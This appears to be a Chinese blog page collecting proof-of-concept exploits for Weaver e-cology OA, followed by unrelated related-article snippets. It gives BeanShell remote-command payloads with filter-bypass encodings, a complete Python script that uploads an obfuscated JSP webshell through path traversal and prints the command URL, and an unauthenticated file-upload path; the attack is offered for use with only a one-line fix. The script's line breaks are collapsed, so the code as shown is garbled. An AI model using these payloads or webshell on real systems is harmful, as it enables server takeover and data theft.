泛微OA &&POC

  • 泛微OA 多版本存在命令执行

POC&EXP来源于网络

漏洞描述:

泛微e-cology OA系统的J**A Beanshell接口可被未授权访问,攻击者调用该Beanshell接口,可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令执行

cnvd编号:CNVD-2019-32204

影响版本:e-cology <=9.0

漏洞修复:屏蔽/weaver/*目录的访问

漏洞复现:

1.漏洞路径:/weaver/bsh.servlet.BshServlet

2.   把print(“hello!”)换成exec(“whoami”),就可以测试能否

执行系统命令了。

Poc1:bsh.script=u0065u0078u0065u0063(“whoami”);&bsh.servlet.output=raw

如果有全局过滤器过滤了exec或eval,会有报错,

可以采用unicode编码、字符串拼接等方式绕过,见下图:

Poc2: bsh.script=u0065u0078u0065u0063(“whoami”);&bsh.servlet.output=raw

Poc3:bsh.script=eval%00(“ex”%2b”ec(bsh.httpServletRequest.getParameter(”command”) )”);&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami

  • 泛微OA weaver.common.ctrl任意文件上传漏洞

一、漏洞描述

泛微OA weaver.common.Ctrl 存在任意文件上传漏洞,攻击者通过漏洞可以上传webshell文件控制服务器

二、漏洞影响

泛微OA

三、漏洞复现

存在漏洞的路径为

/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp

  • 1

使用POC进行文件上传

python poc.py

四、漏洞POC

(来源于网络,作者未知)

import zipfileimport randomimport sysimport requestsdef generate_random_str(randomlength=16):random_str = ''base_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789'length = len(base_str) - 1for i in range(randomlength):random_str += base_str[random.randint(0, length)]return random_strmm = generate_random_str(8)webshell_name1 = mm+'.jsp'
webshell_name2 = '../../../'+webshell_name1
def file_zip():shell = """<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="sun.misc.BASE64Decoder" %>
<%if(request.getParameter("cmd")!=null){BASE64Decoder decoder = new BASE64Decoder();Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU=")));Process e = (Process)rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(newString(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, newObject[]{}), request.getParameter("cmd") );java.io.InputStream in = e.getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}
%>"""   ## 替换shell内容zf = zipfile.ZipFile(mm+'.zip', mode='w', compression=zipfile.ZIP_DEFLATED)zf.writestr(webshell_name2, shell)
def GetShell(urllist):file_zip()# print('上传文件中')urls = urllist + '/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp'file = [('file1', (mm+'.zip', open(mm + '.zip', 'rb'), 'application/zip'))]try:requests.post(url=urls,files=file,timeout=60, verify=False)GetShellurl = urllist+'/cloudstore/'+webshell_name1GetShelllist = requests.get(url = GetShellurl)if GetShelllist.status_code == 200:print(GetShellurl+"?cmd=whoami")except:passGetShell("自己找的漏洞URL")
  • 泛微OA9前台任意文件上传

漏洞位于: /page/exportImport/uploadOperation.jsp文件中

Jsp流程大概是:判断请求是否是multipart请求,然就没有了,直接上传了,啊哈哈哈哈哈重点关注File file=new File(savepath+filename),Filename参数,是前台可控的,并且没有做任何过滤限制

利用非常简单,只要对着127.0.0.1/page/exportImport/uploadOperation.jsp来一个multipartRequest就可以,

然后请求路径:

view-source:http://0.0.0.0:5006/page/exportImport/fileTransfer/1.jsp

【文档留存】泛微OA POC相关推荐

  1. 泛微 OA 集成平台介绍

    泛微 OA 集成平台介绍 简介: <SAP ERP 与泛微 OA 的系统集成>系列文章.SAP ERP 是优秀的企业核心管理系统,泛微 OA 是优秀的企业核心协同系统,我做过多个 SAP ...

  2. webservice python开发接口_基于Python的Webservice开发(四)-泛微OA的SOAP接口

    一.功能需求 泛微e-cology可以在流程中调用Webservice接口实现与其他系统的联动等复杂功能.但是目前泛微文档中仅提供了调用的方法,但是没有关于接口的相关开发信息. 本次案例是用Pytho ...

  3. 工作流初始错误 泛微提交流程提示_泛微OA用户操作手册.pdf

    泛微OA用户操作手册.pdf e-cology 用户使用手册 上海泛微软件 Weaver Software 中国上海浦东软件园陆家嘴分园 峨山路91弄101号3层 邮政编码:200127 电话:+86 ...

  4. 泛微OA集成Wps-V5版本,获取授权相关数据

    wpsV5版本查看授权时间 1.访问开放平台,登录wpsadmin 账号  2. 访问   wps服务部署地址+/open/api/docs_mid_third/app/info  获取超管的appi ...

  5. oa java 二次开发_泛微OA ecology 二次开发实例 开发完整.doc

    泛微OA ecology 二次开发实例 开发完整 二次开发培训文档 ECOLOGY系统框架结构 主要的程序结构 Ecology Classbean 存放编译后的CLASS文件 js 系统中使用的JAV ...

  6. 泛微OA实施要点总结-立哥技术经验

    前言:OA协同办公系统模块和逻辑关系看起来简单,实际项目实施中并不简单.笔者实际部署和实施的经验出发,在初次上手,不熟悉的情况下,和编程开发的难度是同一级的.基础框架的搭建,相对来说是简单的,但是把整 ...

  7. 泛微OA单点登录帆软报表

    帆软提供很多种单点登录有很多种方式,基于不开发的前提,可以使用URL登录插件的方式,即使用get方式将用户名密码发送给帆软服务器进行身份验证. 泛微端配置: 泛微OA的版本: 8.100.0531,提 ...

  8. 泛微OA系统助力江南电缆打造“六合一”数字管理平台

    近日,知名电线电缆品牌--无锡江南电缆有限公司携手泛微OA系统,通过打造协同管理平台,实现集团业务与信息的统一协同.                                           ...

  9. 泛微OA的介绍以及实施计划

    泛微OA是中国领先的OA办公自动化产品商,是一套集OA.合作.工作流一体化的企业级信息化管理软件.它可以帮助企业实践现办公自动化.信息协同.决策智能化等功能,提升企业生产效率和管理水平,是企业数字化转 ...

最新文章

  1. 关于动态规划与备忘录方法的总结
  2. 回顾inputstream和outputstream
  3. shell 密码输入不显示,Shell输出内容不显示密码,Shell实现有密码自动登录sshpass 应用实践...
  4. android 学习过程中登陆失效的个人理解
  5. 讲解web服务所涉及到的重要知识点
  6. 2021牛客多校3 - Black and white(思维+最小生成树)
  7. [导入]Ajax初试
  8. 如何确定你的伴侣真的爱你?复杂数学公式告诉你
  9. Unix——fprintf与stderr、stdout的使用
  10. AutoMapper使用
  11. jQuery框架学习第九天:jQuery工具函数介绍与使用
  12. Notepad++ 配合TCC直接编译运行C代码
  13. php 取某个时间的时间戳,PHP 获取指定年月日的开始和结束时间戳
  14. python数据导入spss_Python/Excel/SPSS/SQL数据处理方法比较之1 - 数据导入
  15. 介绍一款 微信客服平台系统
  16. java判断胡牌_怎么写一个c++程序判断麻将是否胡牌(只讨论清一色的情况)
  17. Python Numpy的数组array和矩阵matrix
  18. 达索系统推出汽车项目智能看板行业解决方案体验
  19. [转载]中国移动深度定制首推“0元购TD手机”补贴政策
  20. C++计算机视觉库OpenCV在Visual Studio 2022的配置方法

热门文章

  1. Windows10打开“运行”窗口
  2. 【耀杨闯荡华儿街】(面试官)曹阿门:给我讲讲多线程;耀杨:md心态崩了~
  3. PDF、Word、Excel文件前端预览实操干货都在这!
  4. 《数据挖掘》读书笔记2、3章节
  5. 商品评论信息与评论信息分类
  6. 中文文本分类——商品评论情感判别
  7. 10、spss做最优尺度分析
  8. 【信号与系统】如何求系统的冲激响应和阶跃响应
  9. 使用Locust进行性能测试,Locust启动失败
  10. Google推荐的15条HTML 5代码军规